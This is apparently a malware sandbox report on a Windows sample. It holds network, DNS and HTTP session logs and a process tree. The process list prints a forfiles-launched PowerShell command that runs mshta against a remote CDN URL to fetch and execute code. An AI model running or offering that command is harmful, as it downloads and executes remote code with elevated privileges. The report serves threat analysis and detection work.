      Sep 17, 2024 09:23:12.825479984 CEST49709443192.168.2.8169.150.247.36
      Sep 17, 2024 09:23:12.826910973 CEST49709443192.168.2.8169.150.247.36
      Sep 17, 2024 09:23:12.826948881 CEST44349709169.150.247.36192.168.2.8
      Sep 17, 2024 09:23:12.827009916 CEST49709443192.168.2.8169.150.247.36
      Sep 17, 2024 09:23:27.218938112 CEST44349707169.150.247.39192.168.2.8
      Sep 17, 2024 09:23:27.218961954 CEST44349707169.150.247.39192.168.2.8
      Sep 17, 2024 09:23:27.219023943 CEST49707443192.168.2.8169.150.247.39
      Sep 17, 2024 09:23:27.219034910 CEST44349707169.150.247.39192.168.2.8
      Sep 17, 2024 09:23:27.219063044 CEST44349707169.150.247.39192.168.2.8
      Sep 17, 2024 09:23:27.219077110 CEST49707443192.168.2.8169.150.247.39
      Sep 17, 2024 09:23:27.219106913 CEST49707443192.168.2.8169.150.247.39
      Sep 17, 2024 09:23:27.219528913 CEST49707443192.168.2.8169.150.247.39
      Sep 17, 2024 09:23:27.219552994 CEST44349707169.150.247.39192.168.2.8
      Sep 17, 2024 09:24:58.781699896 CEST4970580192.168.2.8169.150.236.104
      Sep 17, 2024 09:24:58.983081102 CEST8049705169.150.236.104192.168.2.8
      Sep 17, 2024 09:24:58.983164072 CEST4970580192.168.2.8169.150.236.104
      TimestampSource PortDest PortSource IPDest IP
      Sep 17, 2024 09:23:08.817828894 CEST4928853192.168.2.81.1.1.1
      Sep 17, 2024 09:23:08.826729059 CEST53492881.1.1.1192.168.2.8
      Sep 17, 2024 09:23:10.271748066 CEST6284753192.168.2.81.1.1.1
      Sep 17, 2024 09:23:10.273178101 CEST5550553192.168.2.81.1.1.1
      Sep 17, 2024 09:23:10.276331902 CEST4998353192.168.2.81.1.1.1
      Sep 17, 2024 09:23:10.279954910 CEST53628471.1.1.1192.168.2.8
      Sep 17, 2024 09:23:10.282254934 CEST53555051.1.1.1192.168.2.8
      Sep 17, 2024 09:23:10.393631935 CEST53499831.1.1.1192.168.2.8
      Sep 17, 2024 09:23:11.780946970 CEST5532853192.168.2.81.1.1.1
      Sep 17, 2024 09:23:11.790523052 CEST53553281.1.1.1192.168.2.8
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Sep 17, 2024 09:23:08.817828894 CEST192.168.2.81.1.1.10x1249Standard query (0)vidstreemz.b-cdn.netA (IP address)IN (0x0001)false
      Sep 17, 2024 09:23:10.271748066 CEST192.168.2.81.1.1.10x708bStandard query (0)fonts.bunny.netA (IP address)IN (0x0001)false
      Sep 17, 2024 09:23:10.273178101 CEST192.168.2.81.1.1.10x37d8Standard query (0)bunnycdn.b-cdn.netA (IP address)IN (0x0001)false
      Sep 17, 2024 09:23:10.276331902 CEST192.168.2.81.1.1.10x6d0dStandard query (0)bunny.netA (IP address)IN (0x0001)false
      Sep 17, 2024 09:23:11.780946970 CEST192.168.2.81.1.1.10xc975Standard query (0)bunnycdn.comA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Sep 17, 2024 09:23:08.826729059 CEST1.1.1.1192.168.2.80x1249No error (0)vidstreemz.b-cdn.net138.199.36.7A (IP address)IN (0x0001)false
      Sep 17, 2024 09:23:10.279954910 CEST1.1.1.1192.168.2.80x708bNo error (0)fonts.bunny.netbunnyfonts.b-cdn.netCNAME (Canonical name)IN (0x0001)false
      Sep 17, 2024 09:23:10.279954910 CEST1.1.1.1192.168.2.80x708bNo error (0)bunnyfonts.b-cdn.net169.150.236.104A (IP address)IN (0x0001)false
      Sep 17, 2024 09:23:10.282254934 CEST1.1.1.1192.168.2.80x37d8No error (0)bunnycdn.b-cdn.net169.150.247.37A (IP address)IN (0x0001)false
      Sep 17, 2024 09:23:10.393631935 CEST1.1.1.1192.168.2.80x6d0dNo error (0)bunny.net169.150.247.39A (IP address)IN (0x0001)false
      Sep 17, 2024 09:23:11.790523052 CEST1.1.1.1192.168.2.80xc975No error (0)bunnycdn.com169.150.247.36A (IP address)IN (0x0001)false
      • vidstreemz.b-cdn.net
      • https:
        • bunnycdn.b-cdn.net
        • bunny.net
        • bunnycdn.com
      • fonts.bunny.net
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.849705169.150.236.104802216C:\Windows\System32\mshta.exe
      TimestampBytes transferredDirectionData
      Sep 17, 2024 09:23:10.285645962 CEST355OUTGET /css?family=Rubik:300,400,500,700,900 HTTP/1.1
      Accept: */*
      Accept-Language: en-CH
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: fonts.bunny.net
      Connection: Keep-Alive
      Sep 17, 2024 09:23:10.796505928 CEST875INHTTP/1.1 301 Moved Permanently
      Date: Tue, 17 Sep 2024 07:23:10 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: keep-alive
      Server: BunnyCDN-IL1-1206
      CDN-PullZone: 781720
      CDN-Uid: 3a60ca70-b89d-4cd5-a4b5-34a3468d7e0f
      CDN-RequestCountryCode: US
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
      Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
      Location: https://fonts.bunny.net/css?family=Rubik:300,400,500,700,900
      CDN-RequestId: e0f89f7fe74c73d46502f060c8ddc07b
      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.849704138.199.36.74432216C:\Windows\System32\mshta.exe
      TimestampBytes transferredDirectionData
      2024-09-17 07:23:10 UTC329OUTGET /nexto HTTP/1.1
      Accept: */*
      Accept-Language: en-CH
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: vidstreemz.b-cdn.net
      Connection: Keep-Alive
      2024-09-17 07:23:10 UTC234INHTTP/1.1 403 Forbidden
      Date: Tue, 17 Sep 2024 07:23:10 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Server: BunnyCDN-DE1-1047
      CDN-RequestId: dadb726982688969a757bb31ab82be38
      2024-09-17 07:23:10 UTC725INData Raw: 32 63 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 75 62 69 6b 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 37 30 30 2c 39 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 75 6e 6e 79 63 64 6e 2e 62 2d 63 64 6e 2e 6e 65 74 2f 61 73 73 65 74 73 2f 6c 61 6e 64 69 6e 67 70 61 67 65 2f 63 73 73 2f 75 6e 63 6f 6e 66 69 67 75 72 65 64 2e 63 73 73 22 3e 20 3c 74 69 74 6c 65 3e 42 75 6e 6e 79 43 44 4e 20 4e 6f 64 65 20 44 45 31 2d 31 30 34 37 3c 2f 74
      Data Ascii: 2c9<html><head> <link href="http://fonts.bunny.net/css?family=Rubik:300,400,500,700,900" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css"> <title>BunnyCDN Node DE1-1047</t


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.849706169.150.247.374432216C:\Windows\System32\mshta.exe
      TimestampBytes transferredDirectionData
      2024-09-17 07:23:11 UTC406OUTGET /assets/landingpage/css/unconfigured.css HTTP/1.1
      Accept: */*
      Referer: https://vidstreemz.b-cdn.net/nexto
      Accept-Language: en-CH
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: bunnycdn.b-cdn.net
      Connection: Keep-Alive
      2024-09-17 07:23:11 UTC956INHTTP/1.1 200 OK
      Date: Tue, 17 Sep 2024 07:23:11 GMT
      Content-Type: text/css
      Content-Length: 1199
      Connection: close
      Vary: Accept-Encoding
      Server: BunnyCDN-DE1-1080
      CDN-PullZone: 390
      CDN-Uid: 51eb4203-ff94-48c6-99a5-954f277b91de
      CDN-RequestCountryCode: US
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
      Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
      Cache-Control: public, max-age=2592000
      ETag: "01cf3d6e3f9da1:0"
      Last-Modified: Thu, 29 Aug 2024 07:19:52 GMT
      Backend: 1
      CDN-ProxyVer: 1.04
      CDN-RequestPullSuccess: True
      CDN-RequestPullCode: 200
      CDN-CachedAt: 08/30/2024 05:07:32
      CDN-EdgeStorageId: 1082
      CDN-Status: 200
      CDN-RequestId: cf5e749ec5bdecca714b7117586f6853
      CDN-Cache: HIT
      Accept-Ranges: bytes
      2024-09-17 07:23:11 UTC1199INData Raw: ef bb bf 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 75 62 69 6b 27 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 62 75 6e 6e 79 63 64 6e 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 32 2f 69 6d 61 67 65 73 2f 67 65 6e 65 72 61 6c 2f 69 6c 2d 62 67 2d 62 6c 61 63 6b 2d 66 6c 6f 77 65 72 2e 73 76 67 29 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 20 20
      Data Ascii: html, body { width: 100%; margin: 0; padding: 0; text-align: center; font-family: 'Rubik'; background-image: url(https://bunnycdn.com/assets/v2/images/general/il-bg-black-flower.svg); background-repeat: no-repeat;


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.849707169.150.247.394432216C:\Windows\System32\mshta.exe
      TimestampBytes transferredDirectionData
      2024-09-17 07:23:11 UTC385OUTGET /v2/images/bunnynet-logo.svg HTTP/1.1
      Accept: */*
      Referer: https://vidstreemz.b-cdn.net/nexto
      Accept-Language: en-CH
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: bunny.net
      Connection: Keep-Alive
      2024-09-17 07:23:27 UTC411INHTTP/1.1 502 Bad Gateway
      Date: Tue, 17 Sep 2024 07:23:26 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: close
      Server: BunnyCDN-DE1-1082
      CDN-PullZone: 876725
      CDN-Uid: 3a60ca70-b89d-4cd5-a4b5-34a3468d7e0f
      CDN-RequestCountryCode: US
      ErrorCode: 100
      CDN-Status: 502
      CDN-RequestId: 7dba36fdab1657f696f8453375d5167a
      CDN-Cache: MISS
      cache-control: public, max-age=0, must-revalidate
      2024-09-17 07:23:27 UTC1954INData Raw: 37 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 75 6e 6e 79 6e 65 74 61 73 73 65 74 73 2e 62 2d 63 64 6e 2e 6e 65 74 2f 65 72 72 6f 72 2e 70 6e 67 22 20 2f 3e 0d
      Data Ascii: 79b<!DOCTYPE html><html><head> <title>502 Bad Gateway</title> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="icon" type="image/png" sizes="16x16" href="https://bunnynetassets.b-cdn.net/error.png" />
      2024-09-17 07:23:27 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.849708169.150.236.1044432216C:\Windows\System32\mshta.exe
      TimestampBytes transferredDirectionData
      2024-09-17 07:23:11 UTC355OUTGET /css?family=Rubik:300,400,500,700,900 HTTP/1.1
      Accept: */*
      Accept-Language: en-CH
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Connection: Keep-Alive
      Host: fonts.bunny.net
      2024-09-17 07:23:11 UTC936INHTTP/1.1 200 OK
      Date: Tue, 17 Sep 2024 07:23:11 GMT
      Content-Type: text/css; charset=utf-8
      Content-Length: 14730
      Connection: close
      Vary: Accept-Encoding
      Server: BunnyCDN-IL1-1206
      CDN-PullZone: 781720
      CDN-Uid: 3a60ca70-b89d-4cd5-a4b5-34a3468d7e0f
      CDN-RequestCountryCode: US
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
      Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
      Cache-Control: public, max-age=2592000
      Last-Modified: Mon, 02 Sep 2024 16:30:33 GMT
      CDN-ProxyVer: 1.04
      CDN-RequestPullSuccess: True
      CDN-RequestPullCode: 200
      CDN-CachedAt: 09/02/2024 16:30:33
      CDN-EdgeStorageId: 941
      CDN-Status: 200
      CDN-RequestId: 458a429ce56c13645770470d0fea2f6c
      CDN-Cache: HIT
      Accept-Ranges: bytes
      2024-09-17 07:23:11 UTC14730INData Raw: 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 75 62 69 6b 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 20 31 30 30 25 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 72 75 62 69 6b 2f 66 69 6c 65 73 2f 72 75 62 69 6b 2d 6c 61 74 69 6e 2d 33 30 30 2d 6e 6f 72 6d 61 6c 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 72 75 62 69 6b 2f 66 69 6c 65 73 2f 72 75 62 69 6b 2d 6c 61
      Data Ascii: /* latin */@font-face { font-family: 'Rubik'; font-style: normal; font-weight: 300; font-stretch: 100%; src: url(https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2) format('woff2'), url(https://fonts.bunny.net/rubik/files/rubik-la


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.849709169.150.247.364432216C:\Windows\System32\mshta.exe
      TimestampBytes transferredDirectionData
      2024-09-17 07:23:12 UTC408OUTGET /assets/v2/images/general/il-bg-black-flower.svg HTTP/1.1
      Accept: */*
      Referer: https://vidstreemz.b-cdn.net/nexto
      Accept-Language: en-CH
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: bunnycdn.com
      Connection: Keep-Alive
      2024-09-17 07:23:12 UTC634INHTTP/1.1 200 OK
      Date: Tue, 17 Sep 2024 07:23:12 GMT
      Content-Type: image/svg+xml
      Content-Length: 7267
      Connection: close
      Vary: Accept-Encoding
      Server: BunnyCDN-DE1-1079
      CDN-PullZone: 390
      CDN-Uid: 51eb4203-ff94-48c6-99a5-954f277b91de
      CDN-RequestCountryCode: US
      Cache-Control: public, max-age=2592000
      ETag: "0441a772deeda1:0"
      Last-Modified: Wed, 14 Aug 2024 09:36:40 GMT
      Backend: 1
      CDN-ProxyVer: 1.04
      CDN-RequestPullSuccess: True
      CDN-RequestPullCode: 200
      CDN-CachedAt: 08/23/2024 21:04:11
      CDN-EdgeStorageId: 1079
      CDN-Status: 200
      CDN-RequestId: 1737578862b885e5b3a42cc1fba03fec
      CDN-Cache: HIT
      Accept-Ranges: bytes
      2024-09-17 07:23:12 UTC7267INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 38 38 30 70 78 22 20 68 65 69 67 68 74 3d 22 31 34 32 34 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 38 38 30 20 31 34 32 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 53 6b 65 74 63 68 20 35 32 2e 35 20 28 36 37 34 36 39 29 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e
      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="2880px" height="1424px" viewBox="0 0 2880 1424" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> ... Generator: Sketch 52.5 (67469) - http://www.bohemian


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:03:23:04
      Start date:17/09/2024
      Path:C:\Windows\System32\forfiles.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta https://vidstreemz.b-cdn.net/nexto"
      Imagebase:0x7ff7a0020000
      File size:52'224 bytes
      MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:1
      Start time:03:23:04
      Start date:17/09/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6ee680000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:3
      Start time:03:23:05
      Start date:17/09/2024
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:. mshta https://vidstreemz.b-cdn.net/nexto
      Imagebase:0x7ff6cb6b0000
      File size:452'608 bytes
      MD5 hash:04029E121A0CFA5991749937DD22A1D9
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:4
      Start time:03:23:06
      Start date:17/09/2024
      Path:C:\Windows\System32\mshta.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto
      Imagebase:0x7ff77ade0000
      File size:14'848 bytes
      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:false

      Target ID:6
      Start time:03:23:10
      Start date:17/09/2024
      Path:C:\Windows\System32\svchost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Imagebase:0x7ff67e6d0000
      File size:55'320 bytes
      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      No disassembly